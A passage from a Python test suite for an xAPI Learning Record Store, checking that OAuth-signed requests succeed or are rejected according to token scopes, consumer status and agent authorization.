oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, "OAuth is not enabled. To enable, set the OAUTH_ENABLED flag to true in settings")
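# The sign-and-append step is likewise identical everywhere: build an
# oauth.Request from the token, sign it with HMAC-SHA1, and append the
# signature to the raw header string. A compact sketch built on the
# hypothetical helper above (illustrative only; it mirrors the oauth2 calls
# already used throughout this file):
def _sign_header_params(self, header_params, token, http_method, http_url):
    params = self._oauth_params_to_dict(header_params)  # hypothetical helper sketched above
    req = oauth.Request.from_token_and_callback(token, http_method=http_method,
        http_url=http_url, parameters=params)
    signature = oauth.SignatureMethod_HMAC_SHA1().sign(req, self.consumer, token)
    return header_params + ',oauth_signature="%s"' % signature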
def test_stmt_put(self):
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}})
param = {"statementId":put_guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# Get oauth header params and access token
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request to PUT the stmt
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
# build signature and add to the params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
def test_stmt_post_no_scope(self):
stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_post"}}
stmt_json = json.dumps(stmt)
# Don't send scope so it defaults to statements/write and statements/read/mine
oauth_header_resource_params, access_token = self.oauth_handshake(scope=False)
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth_request and apply signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/', parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
def test_stmt_simple_get(self):
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and apply signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
rsp = resp.content
self.assertIn(guid, rsp)
def test_stmt_complex_get(self):
stmt_data = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_complex_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"activity":"act:test_complex_get"}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and apply signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
def test_stmt_get_then_wrong_scope(self):
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read profile")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature to get statements
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
rsp = resp.content
self.assertIn(guid, rsp)
# =============================================
# Test POST (not allowed)
post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_post"}}
post_stmt_json = json.dumps(post_stmt)
# Use same oauth headers, change the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'another_nonce'
# create another oauth request
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/', parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
# Replace old signature and add the new one
oauth_header_resource_params = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
# Update the nonce in the header string to match the one set in the dict
oauth_header_resource_params = oauth_header_resource_params.replace('oauth_nonce="resource_nonce"','oauth_nonce="another_nonce"')
post = self.client.post('/XAPI/statements/', data=post_stmt_json, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 403)
self.assertEqual(post.content, 'Incorrect permissions to POST at /statements')
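# With 'statements/read profile' scope the GET above succeeds but the POST is
# rejected, since the token was never granted statements/write.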
def test_activity_state_put_then_wrong_scope(self):
url = TEST_SERVER + '/XAPI/activities/state'
testagent = '{"name":"jane","mbox":"mailto:[email protected]"}'
activityId = "http://www.iana.org/domains/example/"
stateId = "id:the_state_id"
activity = Activity(activity_id=activityId)
activity.save()
testparams = {"stateId": stateId, "activityId": activityId, "agent": testagent}
teststate = {"test":"put activity state 1"}
path = '%s?%s' % (url, urllib.urlencode(testparams))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='state')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
put = self.client.put(path, data=teststate, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(put.status_code, 204)
# ==========================================================
# Set up for Get
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# Use same oauth_headers as before and change the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce'
# create another oauth request
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method.sign(oauth_request, self.consumer, access_token)
# Replace old signature with the new one
oauth_header_resource_params_new = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
# Update the nonce in the header string to match the one set in the dict
new_oauth_headers = oauth_header_resource_params_new.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"')
get = self.client.get(path, content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(get.status_code, 403)
self.assertEqual(get.content, 'Incorrect permissions to GET at /statements')
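# NOTE: the next method lacks the test_ prefix, so default unittest discovery
# never runs it; rename it to test_stmt_get_then_wrong_profile_scope to enable it.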
def stmt_get_then_wrong_profile_scope(self):
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
rsp = resp.content
self.assertIn(guid, rsp)
# ===================================================================
url = 'http://testserver/XAPI/agents/profile'
params = {"agent": {"mbox":"mailto:[email protected]"}}
path = "%s?%s" %(url, urllib.urlencode(params))
# Use same oauth header, change nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce'
# create another oauth request
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request, self.consumer, access_token)
# Replace signature with new one
new_sig_params = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2 )
# Update the nonce in the header string to match the one set in the dict
new_oauth_headers = new_sig_params.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"')
r = self.client.get(path, Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 403)
def test_consumer_state(self):
stmt_data = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_complex_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"object":{"objectType": "Activity", "id":"act:test_complex_get"}}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Change the consumer state
consumer = access_token.consumer
consumer.status = 4
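# 4 is one of the provider's non-accepted CONSUMER_STATES values (assumption:
# the exact label depends on the oauth_provider constants), so the signed
# request should now be rejected as coming from an invalid consumer.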
consumer.save()
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.content, 'Invalid Consumer.')
def test_simple_stmt_get_mine_only(self):
guid = str(uuid.uuid1())
# Put statement normally
username = "tester1"
email = "[email protected]"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {"username":username, "email":email,"password":password,"password2":password}
self.client.post(reverse(register),form, X_Experience_API_Version="1.0.0")
param = {"statementId":guid}
path = "%s?%s" % (reverse(statements), urllib.urlencode(param))
stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_put"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
put_resp = self.client.put(path, stmt, content_type="application/json", Authorization=auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put_resp.status_code, 204)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# ====================================================
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read/mine")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 403)
# ===================================================
# build stmt data and path
oauth_agent1 = Agent.objects.get(account_name=self.consumer.key)
oauth_agent2 = Agent.objects.get(mbox="mailto:[email protected]")
oauth_group = Agent.objects.get(member__in=[oauth_agent1, oauth_agent2])
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}, "authority":oauth_group.to_dict()}
settings.ALLOW_EMPTY_HTTP_AUTH = True
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization="Basic %s" % base64.b64encode("%s:%s" % ('','')), X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# Use same oauth headers but replace the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create another oauth request, replace the signature with new one and change the nonce
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
get = self.client.get(path, content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(get.status_code, 200)
settings.ALLOW_EMPTY_HTTP_AUTH = False
def test_complex_stmt_get_mine_only(self):
guid = str(uuid.uuid1())
username = "tester1"
email = "[email protected]"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {"username":username, "email":email,"password":password,"password2":password}
self.client.post(reverse(register),form, X_Experience_API_Version="1.0.0")
# Put statement
param = {"statementId":guid}
path = "%s?%s" % (reverse(statements), urllib.urlencode(param))
stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_put"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
put_response = self.client.put(path, stmt, content_type="application/json", Authorization=auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put_response.status_code, 204)
# =============================================
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read/mine")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 403)
# ====================================================
# Should return 0 statements since the only statement is not this user's
# Use same oauth headers but replace the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce'
# Create another oauth request and add the signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url='http://testserver/XAPI/statements', parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"')
# Get statements
get = self.client.get('http://testserver/XAPI/statements', content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
get_content = json.loads(get.content)
self.assertEqual(get.status_code, 200)
self.assertEqual(len(get_content['statements']), 0)
# ====================================================
# Should return the newly created single statement
# build stmt data and path
oauth_agent1 = Agent.objects.get(account_name=self.consumer.key)
oauth_agent2 = Agent.objects.get(mbox="mailto:[email protected]")
oauth_group = Agent.objects.get(member__in=[oauth_agent1, oauth_agent2])
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}, "authority":oauth_group.to_dict()}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# Use same headers, change nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create oauth request and add signature
oauth_request3 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url='http://testserver/XAPI/statements', parameters=oauth_header_resource_params_dict)
signature_method3 = oauth.SignatureMethod_HMAC_SHA1()
signature3 = signature_method3.sign(oauth_request3, self.consumer, access_token)
sig2 = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature3)
new_oauth_headers2 = sig2.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
# Get statements
get2 = self.client.get('http://testserver/XAPI/statements', content_type="application/json",
Authorization=new_oauth_headers2, X_Experience_API_Version="1.0.0")
get_content2 = json.loads(get2.content)
self.assertEqual(get2.status_code, 200)
self.assertEqual(get_content2['statements'][0]['actor']['name'], 'bill')
self.assertEqual(len(get_content2['statements']), 1)
def test_state_wrong_auth(self):
# This test agent is not in this auth
url = 'http://testserver/XAPI/activities/state'
testagent = '{"name":"joe","mbox":"mailto:[email protected]"}'
activityId = "http://www.iana.org/domains/example/"
stateId = "id:the_state_id"
activity = Activity(activity_id=activityId)
activity.save()
testparams = {"stateId": stateId, "activityId": activityId, "agent": testagent}
teststate = {"test":"put activity state 1"}
path = '%s?%s' % (url, urllib.urlencode(testparams))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='state')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
put = self.client.put(path, data=teststate, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(put.status_code, 404)
self.assertEqual(put.content, "Agent in state cannot be found to match user in authorization")
def test_profile_wrong_auth(self):
agent = Agent(name="joe", mbox="mailto:[email protected]")
agent.save()
# Agent is not in this auth
url = 'http://testserver/XAPI/agents/profile'
testparams = {"agent": '{"name":"joe","mbox":"mailto:[email protected]"}'}
path = '%s?%s' % (url, urllib.urlencode(testparams))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='profile')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
get = self.client.get(path, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(get.status_code, 403)
self.assertEqual(get.content, "Authorization doesn't match agent in profile")
def test_define_scope_activity(self):
url = 'http://testserver/XAPI/statements'
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"},
"authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements - the token does not have the define scope, so this creates another
# activity with canonical_version set to False
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
acts = Activity.objects.all()
self.assertEqual(len(acts), 2)
self.assertEqual(acts[0].activity_id, acts[1].activity_id)
# ==========================================================
# START GET STMT
get_params = {"activity":"test://test/define/scope"}
path = "%s?%s" % (url, urllib.urlencode(get_params))
# Use same oauth headers, change nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create oauth request and add signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
get_resp = self.client.get(path, X_Experience_API_Version="1.0.0", Authorization=new_oauth_headers)
self.assertEqual(get_resp.status_code, 200)
content = json.loads(get_resp.content)
self.assertEqual(len(content['statements']), 2)
self.client.logout()
# ==========================================================
# START OF POST WITH ANOTHER HANDSHAKE
post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"dom"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/tested","display": {"en-US":"tested"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'definename', 'en-GB': 'definealtname'},
'description': {'en-US':'definedesc', 'en-GB': 'definealtdesc'},'type': 'type:course',
'interactionType': 'other'}}}
stmt_json = json.dumps(post_stmt)
